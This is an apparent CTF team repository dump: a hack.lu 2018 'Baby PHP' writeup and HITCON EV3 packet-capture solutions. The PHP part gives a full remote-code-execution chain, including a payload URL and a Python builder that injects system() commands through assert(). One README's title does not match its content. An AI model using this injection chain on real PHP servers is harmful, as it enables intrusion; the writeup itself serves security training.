The `$msg`, `$k1` and `$k2` variables are taken from GET parameters. If the checks in the middle are satisfied, we can also replace `$cc` through `@$cc = $_GET['cc'];` and then create variables with names and values of our own via `$$lel = $hack;`, because `$lel` and `$hack` come from `foreach ($_GET as $lel => $hack)`.

To achieve remote code execution, the following gates have to be passed one after another until the `assert` is reached with variables we control.

### PHP Wrapper

```php
@$msg = $_GET['msg'];
if(@file_get_contents($msg)!=="Hello Challenge!"){
    die('Wow so rude!!!!1');
}
```

Besides a path to a file, `file_get_contents` also accepts [protocols and *wrappers*](http://php.net/manual/en/wrappers.php). Unfortunately, the box seems to have no outbound internet access, so an `http://` URL to a web server we control that serves `Hello Challenge!` does not work. Alternatively, we can use the [`data://`](http://php.net/manual/en/wrappers.data.php) wrapper, which needs no network at all: `data://text/plain,Hello%20Challenge!` as the value of `$msg` makes `file_get_contents` return exactly `Hello Challenge!`.

### Strict Comparison

```php
if(intval($k1) !== $cc || $k1 === $cc){
    die("lol no\n");
}
```

Note that `$k1` is taken from `$_GET['key1']`, so it is always a string. The comparison with `$cc` is strict (value and type must match). `$cc` holds the integer 1337, so we set `$k1` to `1337`: `intval("1337") === 1337` makes the first condition false, and `"1337" === 1337` is false because the types differ, so neither side of the `||` triggers the `die`.

### Loose Comparison

```php
if(strlen($k2) == $bb){
    if(preg_match('/^\d+＄/', $k2) && !is_numeric($k2)){
        if($k2 == $cc){
            @$cc = $_GET['cc'];
        }
    }
}
```

`$k2` must not be numeric, yet must be loosely equal to `$cc`, which holds 1337. The comparison `$k2 == $cc` is loose, and in PHP 7 a string compared with an integer is converted using its leading digits, so any string beginning with `1337` followed by non-numeric characters passes. Its length must equal `$bb`, which is 42 (`strlen` counts bytes, so the three UTF-8 bytes of `＄` count as three). The regex must also match, and since the dollar sign in it is the full-width `＄` rather than an end anchor, `1337` must be followed by exactly that character. `1337%EF%BC%8400000000000000000000000000000000000` (`1337`, the UTF-8 bytes of `＄`, and 35 zeros: 4 + 3 + 35 = 42 bytes) as the value of `$k2` therefore lets us control `$cc`. Note that this relies on PHP 7 semantics: PHP 8 compares a non-numeric string with an integer as strings, so the same `$k2` compared with 1337 is false there.

### NULL Comparison

```php
if(substr($cc, $bb) === sha1($cc)){
    foreach ($_GET as $lel => $hack){
        $$lel = $hack;
    }
}
```

`$bb` is 42 and we now control `$cc`. Satisfying `substr($cc, $bb) === sha1($cc)` with a string looks hard. The trick is to use an array: `substr([], 42)` and `sha1([])` both emit a warning and return NULL in PHP 7 (in PHP 8 they throw a `TypeError` instead), so `NULL === NULL` holds. Passing `cc[]=a` in the GET request makes `$cc` an array, after which the `foreach` lets us create variables with names and values of our choosing.
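At this point every gate up to the `foreach` is understood, and the two that remain (the variable variable and the `assert`) only need `k1=2` and a `bb` payload. The following is an added example, not code from the original writeup: a Python helper that assembles the full request and re-checks each gate locally under the PHP 7 semantics the chain depends on, so a malformed payload is caught before it is sent. The target URL, the `is_numeric()` approximation and the `php8` switch (modelling PHP 8's stricter string/int comparison and `TypeError`s) are assumptions of the example, not details from the page.

```python
"""Added example for the Baby PHP chain (not the writeup's own code): build the GET
parameters that pass each check in order and verify them locally with the PHP 7
semantics the chain relies on, before anything is sent.  Assumed, not taken from
the page: the target URL comes from the caller, is_numeric() is approximated, and
php8=True models PHP 8's stricter string/int comparison and TypeErrors."""
import re
from urllib.parse import quote, unquote, urlencode

FULLWIDTH_DOLLAR = "\uff04"   # U+FF04 (UTF-8 EF BC 84): the "$" in preg_match('/^\d+＄/')
CC0, BB0 = 1337, 42           # $cc and $bb before they are overwritten
RLO_B = "2"                   # value of the variable named "\u202eb", so $$a is "2"
TARGET = "Hello Challenge!"


def php_leading_int(s: str) -> int:
    """PHP 7 string-to-int cast as used by ==: leading digits of the string, else 0."""
    m = re.match(r"\s*[+-]?[0-9]+", s)
    return int(m.group()) if m else 0


def php_is_numeric(s: str) -> bool:
    """Approximation of is_numeric(): optional leading space and sign, digits, '.', exponent."""
    return re.fullmatch(r"\s*[+-]?([0-9]+(\.[0-9]*)?|\.[0-9]+)([eE][+-]?[0-9]+)?", s) is not None


def php_loose_eq_int(s: str, n: int, php8: bool = False) -> bool:
    """`$s == $n` for a string and an int: PHP 7 casts the string to a number,
    PHP 8 compares a non-numeric string against str($n) instead."""
    if php8 and not php_is_numeric(s):
        return s == str(n)
    return php_leading_int(s) == n


def build_params(cmd: str) -> dict:
    """GET parameters, in the order the script consumes them."""
    k2 = "1337" + FULLWIDTH_DOLLAR                  # digits, then the full-width dollar
    k2 += "0" * (BB0 - len(k2.encode()))            # pad to strlen() == 42 *bytes*
    cmd = cmd.replace("\\", "\\\\").replace("'", "\\'")
    return {
        "msg": "data://text/plain," + TARGET,       # data:// wrapper, no network needed
        "key1": str(CC0),                           # intval("1337") === 1337 and "1337" !== 1337
        "key2": k2,
        "cc[]": "a",                                # $cc becomes an array: substr()/sha1() give NULL
        "k1": RLO_B,                                # set by $$lel = $hack, must equal ${"\u202eb"}
        "bb": f"system('{cmd}'); //",               # the // comments out " == Array"
    }


def assert_source(bb: str) -> str:
    """The code assert() evaluates: "$bb == $cc", with the array $cc stringified."""
    return f"{bb} == Array"


def check_gates(p: dict, php8: bool = False) -> list:
    """Names of the checks that would die() for these parameters (empty = assert reached)."""
    failed, cc = [], CC0
    scheme, _, payload = p["msg"].partition(",")    # file_get_contents($msg) !== "Hello Challenge!"
    if not (scheme.startswith("data:") and unquote(payload) == TARGET):
        failed.append("wrapper")
    if php_leading_int(p["key1"]) != cc:            # intval($k1) !== $cc ($k1 === $cc never holds)
        failed.append("strict")
    k2 = p["key2"]                                  # strlen, /^\d+＄/, !is_numeric, $k2 == $cc
    if (len(k2.encode()) == BB0 and re.match("[0-9]+" + FULLWIDTH_DOLLAR, k2)
            and not php_is_numeric(k2) and php_loose_eq_int(k2, cc, php8)):
        cc = ["a"] if "cc[]" in p else p.get("cc")
    else:
        failed.append("loose")
    if not isinstance(cc, list) or php8:            # substr($cc,$bb) === sha1($cc): NULL === NULL only
        failed.append("null")                       # for an array on PHP 7; PHP 8 throws TypeError
    if p.get("k1") != RLO_B:                        # $$a !== $k1, $k1 having been set by the foreach
        failed.append("varvar")
    if not re.search(r";\s*//", p["bb"]):           # assert("$bb == $cc") must stay valid PHP
        failed.append("assert")
    return failed


def build_url(base: str, cmd: str) -> str:
    """Full request URL; quote() encodes ＄ as %EF%BC%84 and spaces as %20, like the writeup's."""
    return base + "?" + urlencode(build_params(cmd), quote_via=quote)
```

`build_url("https://arcade.fluxfingers.net:1819/", "cat flag.php")` reproduces the writeup's request with `＄` as `%EF%BC%84` and `cc[]` as `cc%5B%5D`; PHP's `data://` wrapper percent-decodes its payload, so the page's `Hello%20Challenge!` form passes the same `check_gates` test. Running `check_gates(p, php8=True)` reports `loose` and `null`: on PHP 8 a non-numeric string never loosely equals an integer and `substr()`/`sha1()` throw on an array, which is why this chain is PHP 7 only.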

### Variable Variable

```php
$ b = "2";$a=" b";//;1=b

if($$a !== $k1){
    die("lel no\n");
}
```

In PHP, a [*variable variable*](http://php.net/manual/en/language.variables.variable.php) reads a variable whose name is computed at run time. Here `$a` holds the name `" b"` (U+202E followed by `b`; the character before `b` is not a space), so `$$a` is the value of `$ b`, which is the string `"2"`. Since the previous step lets us set any variable, we simply add `k1=2` to the request so that `$k1` is the string `"2"`, `$$a !== $k1` is false, and the script continues.

### Remote Code Execution

```php
assert("$bb == $cc");
```

We control both `$bb` and `$cc`, but `$cc` has to stay an array, which stringifies to `Array` inside the double-quoted string. The evaluated code must be syntactically valid, and a trailing `== Array` is a syntax error. The trick is to end `$bb` with `;` and a `//` line comment, which swallows the rest of the evaluated string. Then we can run any PHP code; for remote code execution we can use a function such as `system`. For example, to read `flag.php` we set `$bb` to `system('cat flag.php'); // `, so that `assert` evaluates `system('cat flag.php'); //  == Array`.

### Final Exploit

Here is an example request that retrieves the flag (`%EF%BC%84` is `＄`, `%27` is `'`, and the `view-source:` prefix only keeps the browser from rendering the returned PHP file as HTML):

```
view-source:https://arcade.fluxfingers.net:1819/?msg=data://text/plain,Hello%20Challenge!&key1=1337&key2=1337%EF%BC%8400000000000000000000000000000000000&cc[]=a&k1=2&bb=system(%27cat%20flag.php%27);%20//%20%22
```


## Bahasa Indonesia
Given the following PHP code (each of its checks is quoted again in the sections below):

```php
$hack){
        $$lel = $hack;
    }
}

$ b = "2";$a=" b";//;1=b

if($$a !== $k1){
    die("lel no\n");
}

// plz die now
assert_options(ASSERT_BAIL, 1);
assert("$bb == $cc");

echo "Good Job ;)";
// TODO
// echo $flag;
```

There are several traps in this problem.
First, note that `preg_match('/^\d+＄/', $k2)` does not use the ASCII dollar sign `$` but `＄`, the Unicode [full width dollar sign](http://graphemica.com/%EF%BC%84). Second, when the source is displayed with `highlight_file(__FILE__);`, one line looks like this:

![](trap.png)

The real code is `$ b = "2";$a=" b";//;1=b`: the variable name `$ b` and the assignment `$a=" b"` contain the Unicode character U+202E, the [right-to-left override](https://www.charbase.com/202e-unicode-right-to-left-override), so the string is displayed reversed.

Our goal is to reach `echo "Good Job ;)";`. The commented-out `// echo $flag;` shows that a variable named `$flag` exists but is never written to the output. We can use `assert("$bb == $cc");` to control code execution if we can control `$bb` or `$cc`, because `assert` [evaluates a string argument like `eval`](http://php.net/manual/en/function.assert.php).

The `$msg`, `$k1` and `$k2` variables can be controlled through GET requests. If the checks are satisfied, we can also replace `$cc` in the middle through `@$cc = $_GET['cc'];` and create variables with names and values of our own through `$$lel = $hack;`, because `$lel` and `$hack` come from `foreach ($_GET as $lel => $hack)`.

To reach remote code execution, the following things have to be exploited and done, one after another, until the `assert` is reached with variables we control.

### PHP Wrapper

```php
@$msg = $_GET['msg'];
if(@file_get_contents($msg)!=="Hello Challenge!"){
    die('Wow so rude!!!!1');
}
```

Besides a path to a file, `file_get_contents` also accepts [protocols and *wrappers*](http://php.net/manual/en/wrappers.php).
Unfortunately, the internet seems to be switched off, so an `http://` URL to a web server we control serving `Hello Challenge!` does not work. Alternatively, we can use [`data://`](http://php.net/manual/en/wrappers.data.php): `data://text/plain,Hello%20Challenge!` as the value of `$msg`.

### Strict Comparison

```php
if(intval($k1) !== $cc || $k1 === $cc){
    die("lol no\n");
}
```

Note that `$k1` is taken from `$_GET['key1']`, so its type is string. The comparison with `$cc` is strict (value and type must match). `$cc` holds the number 1337, so we can set `$k1` to 1337; `$k1 === $cc` is then `false` because the types differ.

### Loose Comparison

```php
if(strlen($k2) == $bb){
    if(preg_match('/^\d+＄/', $k2) && !is_numeric($k2)){
        if($k2 == $cc){
            @$cc = $_GET['cc'];
        }
    }
}
```

`$k2` must not be numeric but must be equal to `$cc`, which holds 1337. The comparison is loose, so we can set `$k2` to a string beginning with 1337. The length must match `$bb`, which is 42. The regex must also match (remember that the dollar sign is a trap: after 1337 we have to put the Unicode character `＄`). We can use `1337%EF%BC%8400000000000000000000000000000000000` as the value of `$k2` so that `$cc` becomes controllable.

### NULL Comparison

```php
if(substr($cc, $bb) === sha1($cc)){
    foreach ($_GET as $lel => $hack){
        $$lel = $hack;
    }
}
```

`$bb` is 42 and we control `$cc`. It looks hard to satisfy `substr($cc, $bb) === sha1($cc)` the usual way. The trick is to use an array.
`substr([], 42)` and `sha1([])` both evaluate to NULL, so the comparison holds. We can make `$cc` an array in the GET request so that we can create variables with names and values we choose.

### Variable Variable

```php
$ b = "2";$a=" b";//;1=b

if($$a !== $k1){
    die("lel no\n");
}
```

In PHP, a [*variable variable*](http://php.net/manual/en/language.variables.variable.php) reads a value through a dynamically computed name. In the snippet above, the value of `$$a` is `2`. Remember that the character before `b` is not a space but the Unicode character U+202E. Since we can control `$k1` through the previous step, it is enough to set `$k1` to `2`.

### Remote Code Execution

```php
assert("$bb == $cc");
```

We can control `$bb` and `$cc`, but `$cc` has to be an array, which becomes `Array` when converted to a string. The syntax has to be valid, and `== Array` is a syntax error when the string is evaluated. The trick is to use `;` and a `//` comment in `$bb`. After that we can run any PHP code. For remote code execution we can use a function such as `system`. For example, to read the file `flag.php`, we set `$bb` to `system('cat flag.php'); // `.

### Final Exploit

Here is one request that retrieves the flag.

```
view-source:https://arcade.fluxfingers.net:1819/?msg=data://text/plain,Hello%20Challenge!&key1=1337&key2=1337%EF%BC%8400000000000000000000000000000000000&cc[]=a&k1=2&bb=system(%27cat%20flag.php%27);%20//%20%22
```
--------------------------------------------------------------------------------
/hacklu2018/baby-php/trap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-php/trap.png
--------------------------------------------------------------------------------
/hacklu2018/baby-reverse/README.md:
--------------------------------------------------------------------------------
# Baby Reverse
---
**Points:** 108 | **Solves:** 254/1035 | **Category:** Reverse

Hey there!

Disclaimer: This chall is intended for new gamers only ;-)! You veterans got plenty of other Challenges which will keep you busy, so please pass this Challenge to someone, who never or rarely reversed before! We encourage everyone who never reversed anything to try this challenge. We believe in you and your future reversing skills =). You CAN do it!

The task is to find the correct input which will be the flag. See the challenge files for more instructions.

[Download](babyreverse_7f08571960ce032bf2a9a0ffb7a1c427.zip)
---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO
--------------------------------------------------------------------------------
/hacklu2018/baby-reverse/babyreverse_7f08571960ce032bf2a9a0ffb7a1c427.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/baby-reverse/babyreverse_7f08571960ce032bf2a9a0ffb7a1c427.zip
--------------------------------------------------------------------------------
/hacklu2018/cheat-console/CheatConsole_4648d68145298cca67d3a6b97d6dbe50.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/cheat-console/CheatConsole_4648d68145298cca67d3a6b97d6dbe50.zip
--------------------------------------------------------------------------------
/hacklu2018/forgetful-commander/ForgetfulCommander_85dcf6730d6936301904fc2218c77d6c.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hacklu2018/forgetful-commander/ForgetfulCommander_85dcf6730d6936301904fc2218c77d6c.zip
--------------------------------------------------------------------------------
/hacklu2018/heap-heaven-2/README.md:
--------------------------------------------------------------------------------
# Relations
---
**Points:** 205 | **Solves:** 73/1035 | **Category:** Crypto

Two completely unrelated operations on completely unrelated values, right?

`nc arcade.fluxfingers.net 1821`
---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO
--------------------------------------------------------------------------------
/hacklu2018/relations/README.md:
--------------------------------------------------------------------------------
# Relations
---
**Points:** 205 | **Solves:** 73/1035 | **Category:** Crypto

Two completely unrelated operations on completely unrelated values, right?

`nc arcade.fluxfingers.net 1821`
---

[Bahasa Indonesia](#bahasa-indonesia)

## English
TODO


## Bahasa Indonesia
TODO
--------------------------------------------------------------------------------
/hitcon2018/README.md:
--------------------------------------------------------------------------------
# HITCON CTF 2018 Online Quals

https://ctftime.org/event/669

## Misc
- [ev3-basic (100)](ev3-basic)
- [ev3-scanner (180)](ev3-scanner)

## Web
- [Baby Cake (400)](baby-cake)
--------------------------------------------------------------------------------
/hitcon2018/baby-cake/baby_cake.tgz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/baby-cake/baby_cake.tgz
--------------------------------------------------------------------------------
/hitcon2018/baby-cake/screenshot.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/baby-cake/screenshot.png
--------------------------------------------------------------------------------
/hitcon2018/ev3-basic/README.md:
--------------------------------------------------------------------------------
# ev3-basic
---
**Points:** 100 | **Solves:** 255/1789 | **Category:** Misc

Find the flag.

[Download](ev3basic-1e0165aa826649b7e3c5869a62faf8ba.tar.gz)

Author: Jeffxx

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
The given tar file contains an image of a LEGO EV3 brick printing part of the flag on its screen, and a pklg file (Apple PacketLogger format, which Wireshark opens) with a capture of the Bluetooth RFCOMM traffic to the brick. Use this Wireshark display filter to see only the data sent to the LEGO EV3 device:

```
bluetooth.dst == 00:16:53:61:30:c1 && btrfcomm
```

After applying the filter, we see many packets with a frame length between 32 and 34 bytes. We take two of them and compare their data:

```
0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*.
0010 00 00 00 84 05 01 0a 81 28 84 68 00 84 00 80 9a ........(.h.....

0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*.
0010 00 00 00 84 05 01 14 81 28 84 69 00 84 00 80 9a ........(.i.....
```

The two packets differ in only two bytes, at offsets `0x16` and `0x1a`. Offset `0x1a` holds `h` and `i`, which we suspect are flag pieces. Comparing with the given image, the characters `h` and `i` are printed side by side, so we conclude that offset `0x16` is the x coordinate on the LEGO EV3 screen (the byte at `0x18`, identical in both packets, is the y coordinate of the row).

Knowing that, we extract the x coordinate, y coordinate and printed character from every packet whose length is between 32 and 34 bytes, and then only need to sort the data by row and column.

The following is the script used.

```python
# Each entry is "x:y:char" in hex, extracted from the packets as described above.
flagp = ["0a:28:68", "14:28:69", "1e:28:74", "1e:44:5f", "14:52:6f", "0a:36:5f",
         "1e:52:70", "14:36:63", "0a:44:6e", "14:44:64", "1e:36:6f", "0a:52:6c",
         "64:52:7d", "46:28:7b", "5a:28:31", "3c:28:6e", "28:28:63", "6e:28:64",
         "32:28:6f", "50:28:6d", "78:36:69", "28:52:65", "46:52:6b", "3c:44:72",
         "28:44:66", "5a:44:61", "3c:36:75", "64:36:61", "32:44:69", "78:28:35",
         "64:28:6e", "5a:52:74", "78:44:5f", "64:44:72", "46:36:6e", "50:52:69",
         "32:36:6d", "28:36:6d", "5a:36:63", "46:44:6d", "6e:36:74", "50:36:69",
         "3c:52:5f", "50:44:77", "32:52:72", "6e:44:65", "8c:44:65", "a0:36:61",
         "96:44:76", "82:44:64", "a0:44:65", "96:28:72", "82:36:6f", "a0:28:6d",
         "8c:28:30", "96:36:5f", "82:28:74", "8c:36:6e"]

flag = {}

def parse(sc):
    x, y, c = (int(v, 16) for v in sc.split(":"))
    flag[(y, x)] = chr(c)   # sort key: row (y) first, then column (x)

for f in flagp:
    parse(f)

sflag = ""

for i in sorted(flag):
    sflag += flag[i]

print(sflag)
```

Flag: **hitcon{m1nd5t0rm_communication_and_firmware_developer_kit}**


## Bahasa Indonesia
The given tar file contains an image and a pklg file that can be opened with Wireshark. The image shows a LEGO EV3 displaying pieces of the flag, while the pklg file contains the data transmitted over the RFCOMM protocol. Apply a filter in Wireshark to see what is sent to the LEGO EV3 device:

```
bluetooth.dst == 00:16:53:61:30:c1 && btrfcomm
```

After filtering, we see many packets with a length of about 32-34 bytes. We analyse the first two packets of that length:

```
0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*.
0010 00 00 00 84 05 01 0a 81 28 84 68 00 84 00 80 9a ........(.h.....

0000 02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 .. ....@...'..*.
0010 00 00 00 84 05 01 14 81 28 84 69 00 84 00 80 9a ........(.i.....
```

Between the two packets only 2 bytes differ, at offsets `0x16` and `0x1a`. Offset `0x1a` holds the letters `h` and `i`, which we suspect are pieces of the flag. Relating this to the given image, the letters `h` and `i` are next to each other, so we conclude that offset `0x16` is the `x coordinate` of the LEGO EV3 screen.

Knowing that, we extract the data from all packets with length 32-34. What we take is the x coordinate, the y coordinate and the printed letter. Then we sort the data obtained.

The following is the script used.

```python
# Each entry is "x:y:char" in hex, extracted from the packets as described above.
flagp = ["0a:28:68", "14:28:69", "1e:28:74", "1e:44:5f", "14:52:6f", "0a:36:5f",
         "1e:52:70", "14:36:63", "0a:44:6e", "14:44:64", "1e:36:6f", "0a:52:6c",
         "64:52:7d", "46:28:7b", "5a:28:31", "3c:28:6e", "28:28:63", "6e:28:64",
         "32:28:6f", "50:28:6d", "78:36:69", "28:52:65", "46:52:6b", "3c:44:72",
         "28:44:66", "5a:44:61", "3c:36:75", "64:36:61", "32:44:69", "78:28:35",
         "64:28:6e", "5a:52:74", "78:44:5f", "64:44:72", "46:36:6e", "50:52:69",
         "32:36:6d", "28:36:6d", "5a:36:63", "46:44:6d", "6e:36:74", "50:36:69",
         "3c:52:5f", "50:44:77", "32:52:72", "6e:44:65", "8c:44:65", "a0:36:61",
         "96:44:76", "82:44:64", "a0:44:65", "96:28:72", "82:36:6f", "a0:28:6d",
         "8c:28:30", "96:36:5f", "82:28:74", "8c:36:6e"]

flag = {}

def parse(sc):
    x, y, c = (int(v, 16) for v in sc.split(":"))
    flag[(y, x)] = chr(c)   # sort key: row (y) first, then column (x)

for f in flagp:
    parse(f)

sflag = ""

for i in sorted(flag):
    sflag += flag[i]

print(sflag)
```

Flag:
**hitcon{m1nd5t0rm_communication_and_firmware_developer_kit}**
--------------------------------------------------------------------------------
/hitcon2018/ev3-basic/ev3basic-1e0165aa826649b7e3c5869a62faf8ba.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PDKT-Team/ctf/2c2c237c0a7c2fda1e8864838f2812479bbd8c4d/hitcon2018/ev3-basic/ev3basic-1e0165aa826649b7e3c5869a62faf8ba.tar.gz
--------------------------------------------------------------------------------
/hitcon2018/ev3-scanner/README.md:
--------------------------------------------------------------------------------
# ev3-scanner
---
**Points:** 180 | **Solves:** 84/1789 | **Category:** Misc

Find the flag.

[Download](ev3scanner-6b325d724565e51b3e2f8e59ff5ee6c9.tar.gz)

Author: Jeffxx

---

[Bahasa Indonesia](#bahasa-indonesia)

## English
The given tar file contains an image and a pklg file that can be opened with Wireshark. The image shows a LEGO EV3 with a colour sensor, apparently about to scan a sheet of paper on which the flag is printed, while the pklg file contains the data transmitted over the RFCOMM protocol. This time the interesting direction is from the brick, so use this Wireshark filter to see the colour data sent by the LEGO EV3:

```
bluetooth.src == 00:16:53:61:30:c1 && btrfcomm
```

After applying the filter, we see many packets with a 9-byte RFCOMM payload, so we narrow the filter further:

```
btrfcomm.len == 9
```

Comparing these packets, only the last 2-3 bytes differ. Two values, `c0 40` and `80 3f`, appear many times in sequence. We suspect they represent black and white (decoded as little-endian floats they are 6.0 and 1.0, which in the EV3 colour sensor's colour mode are the codes for white and black respectively). Any other value we treat as the colour read when the LEGO EV3 runs off the paper and changes direction, which lets us split the readings into one scanned row per pass.
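The packet analysis above, for ev3-basic as well as for the colour replies just described, can be made systematic by decoding the EV3 direct-command protocol instead of comparing bytes at fixed offsets. The following is an added example, not part of this writeup or of the linked solve.py; the opcode and parameter-encoding names it uses (opUI_DRAW, opUI_FLUSH, LC0/LC1/LC2/LC4/LCS, the COL-COLOR code table) come from the EV3 Firmware Developer Kit, not from the page. It decodes the two frames quoted in the ev3-basic section and the first six replies of line1.txt below, both embedded as constructed sample input.

```python
"""Added example (not the writeup's code, nor its solve.py): a decoder for the LEGO EV3
direct-command protocol used in both EV3 tasks.  ev3-basic: commands *to* the brick, whose
opUI_DRAW TEXT instructions carry the position and text of each flag piece.  ev3-scanner:
replies *from* the brick, each carrying one float32 colour code.  Assumed from the EV3
Firmware Developer Kit, not from the page: parameter encodings LC0/LC1/LC2/LC4/LCS,
opcodes opUI_FLUSH 0x80 and opUI_DRAW 0x84 (sub-commands UPDATE 0x00, TEXT 0x05) and the
COL-COLOR code table.  Anything else raises instead of guessing."""
import struct

OP_UI_FLUSH, OP_UI_DRAW = 0x80, 0x84
UI_DRAW_UPDATE, UI_DRAW_TEXT = 0x00, 0x05
COLOR_CODES = {0: "none", 1: "black", 2: "blue", 3: "green",
               4: "yellow", 5: "red", 6: "white", 7: "brown"}

# Constructed sample: the two frames quoted in the ev3-basic writeup.  Bytes 0..0x0b are
# HCI/L2CAP/RFCOMM framing, the EV3 message starts at 0x0c, the last byte is the RFCOMM FCS.
BASIC_FRAMES = [bytes.fromhex(h) for h in (
    "02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 00 00 00 84 05 01 0a 81 28 84 68 00 84 00 80 9a",
    "02 0c 20 1b 00 17 00 40 00 0b ef 27 11 00 2a 00 00 00 00 84 05 01 14 81 28 84 69 00 84 00 80 9a")]
# Constructed sample: the first six replies in the writeup's flag/line1.txt (RFCOMM payloads).
SCANNER_REPLIES = ["07002a000200008040", "07002a00020000c040", "07002a00020000c040",
                   "07002a00020000803f", "07002a000200000040", "07002a00020000c040"]


def ev3_message(data: bytes, offset: int = 0) -> bytes:
    """The length-prefixed EV3 message at `offset`; the 2-byte length excludes itself."""
    (n,) = struct.unpack_from("<H", data, offset)
    return data[offset + 2:offset + 2 + n]


def read_param(code: bytes, i: int):
    """Decode the constant parameter at code[i] -> (value, index of the next byte)."""
    b = code[i]
    if not (b & 0x80):                                  # short form
        if b & 0x40:
            raise ValueError("variable parameters are not handled")
        v = b & 0x3F                                    # LC0: 6-bit two's complement
        return (v - 0x40 if v & 0x20 else v), i + 1
    if b in (0x80, 0x84):                               # LCS: zero-terminated string
        end = code.index(0, i + 1)
        return code[i + 1:end].decode("latin-1"), end + 1
    fmt = {0x81: "<b", 0x82: "<h", 0x83: "<i"}.get(b)   # LC1 / LC2 / LC4: signed little-endian
    if fmt is None:
        raise ValueError(f"unsupported parameter encoding 0x{b:02x}")
    return struct.unpack_from(fmt, code, i + 1)[0], i + 1 + struct.calcsize(fmt)


def decode_command(msg: bytes) -> list:
    """Direct command (without its length prefix) -> [(mnemonic, params)]."""
    counter, kind = struct.unpack_from("<HB", msg, 0)   # message counter, command type
    if kind not in (0x00, 0x80):                        # DIRECT_COMMAND_REPLY / _NO_REPLY
        raise ValueError(f"not a direct command (type 0x{kind:02x})")
    code, i, ops = msg[5:], 0, []                       # skip the 2 bytes of variable sizes
    while i < len(code):
        op, i = code[i], i + 1
        if op == OP_UI_FLUSH:
            ops.append(("UI_FLUSH", ()))
            continue
        if op != OP_UI_DRAW or i >= len(code):
            raise ValueError(f"unsupported opcode 0x{op:02x} at {i - 1}")
        sub, i = code[i], i + 1
        if sub == UI_DRAW_UPDATE:
            ops.append(("UI_DRAW.UPDATE", ()))
        elif sub == UI_DRAW_TEXT:                       # parameters: color, x, y, string
            vals = []
            for _ in range(4):
                v, i = read_param(code, i)
                vals.append(v)
            ops.append(("UI_DRAW.TEXT", tuple(vals)))
        else:
            raise ValueError(f"unsupported UI_DRAW sub-command 0x{sub:02x}")
    return ops


def screen_text(commands) -> str:
    """Text drawn by UI_DRAW.TEXT in screen order: one line per y, left to right by x."""
    pieces = {}
    for ops in commands:
        for name, params in ops:
            if name == "UI_DRAW.TEXT":
                _color, x, y, text = params
                pieces[(y, x)] = text
    rows = {}                                           # insertion order follows sorted (y, x)
    for (y, x), text in sorted(pieces.items()):
        rows[y] = rows.get(y, "") + text
    return "\n".join(rows.values())


def decode_reply(msg_hex: str):
    """9-byte direct reply -> (counter, colour code); the payload is one float32."""
    msg = ev3_message(bytes.fromhex(msg_hex))
    counter, kind = struct.unpack_from("<HB", msg, 0)
    if kind != 0x02:                                    # DIRECT_REPLY (0x04 is DIRECT_REPLY_ERROR)
        raise ValueError(f"not a direct reply (type 0x{kind:02x})")
    return counter, int(struct.unpack_from("<f", msg, 3)[0])


def scan_row(reply_hexes, ink="#", paper=".") -> str:
    """One scanner pass: black -> ink, white -> paper, any other colour -> off the page."""
    codes = (decode_reply(h)[1] for h in reply_hexes)
    return "".join(ink if c == 1 else paper if c == 6 else " " for c in codes)
```

Decoding rather than slicing also accounts for the 32 to 34 byte frame lengths: a coordinate of 32 or more no longer fits the one-byte LC0 form, so the parameter grows to two (LC1) or three (LC2) bytes and the fixed offsets `0x16`/`0x18`/`0x1a` shift with it. For the scanner, every reply other than 1.0 (black) and 6.0 (white), here 4.0 (yellow) and 2.0 (blue), marks the sensor leaving the paper, which is exactly the row delimiter the writeup relies on.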

Using [this script](flag/solve.py) to iterate over the extracted data, we got output resembling the flag. With a little adjustment we got the flag.

![](flag.png)

Flag: **hitcon{EV3GYROSUCKS}**


## Bahasa Indonesia
The given tar file contains an image and a pklg file that can be opened with Wireshark. The image shows a LEGO EV3 that, using a colour sensor, is apparently going to scan a sheet of paper containing the flag. The pklg file contains the data transmitted over the RFCOMM protocol. Apply a filter in Wireshark to see the colour data sent by the LEGO EV3:

```
bluetooth.src == 00:16:53:61:30:c1 && btrfcomm
```

After filtering, we see many packets with a data length of 9 bytes. Add another filter for data of length 9:

```
btrfcomm.len == 9
```

After analysing this set of packets, the bytes differ only in the last 2-3 bytes. Besides that, the values `c0 40` and `80 3f` appear many times in sequence in these packets. We suspect these values represent black and white. Any value other than those two we treat as the colour read when the LEGO EV3 leaves the paper and turns around. This lets us extract the scanned colour data row by row.

Using a [script](flag/solve.py) to iterate over the data we extracted, we got an image resembling the flag. With a little adjustment we obtained the flag.
